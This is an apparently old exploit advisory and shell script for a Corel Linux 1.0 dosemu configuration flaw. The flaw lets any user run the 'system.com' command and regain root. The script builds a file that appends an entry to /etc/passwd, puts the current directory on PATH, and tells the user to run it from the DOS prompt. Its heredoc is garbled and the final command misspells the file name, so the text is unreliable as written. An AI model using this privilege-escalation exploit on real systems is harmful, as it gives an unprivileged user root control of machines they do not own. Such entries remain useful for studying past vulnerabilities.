# # # suid@suid.kg - Corel Linux dosemu config error. Local root compromise. # # Software: Corel Linux 1.0 dosemu distribution configuration # URL: http://linux.corel.com # Version: Version 1.0 # # The system.com command is available to any user who runs the # dos emulator. This is a direct violation of the advice from # the SECURITY readme file: # # Never allow the 'system.com' command (part of dosemu) # to be executed. It makes dosemu execute the libc # 'system() function'. Though privileges are turned off, # the process inherits the switched uid-setting (uid=root, # euid=user), hence the unix process can use setreuid to # gain root access back. ... the rest you can imagine your self. # id cat > hack-corel <> /etc/passwd EOF chmod a+rx hack-corel export PATH="$PATH:." dos echo "when you hit a C:\ prompt, type 'system hack-core'"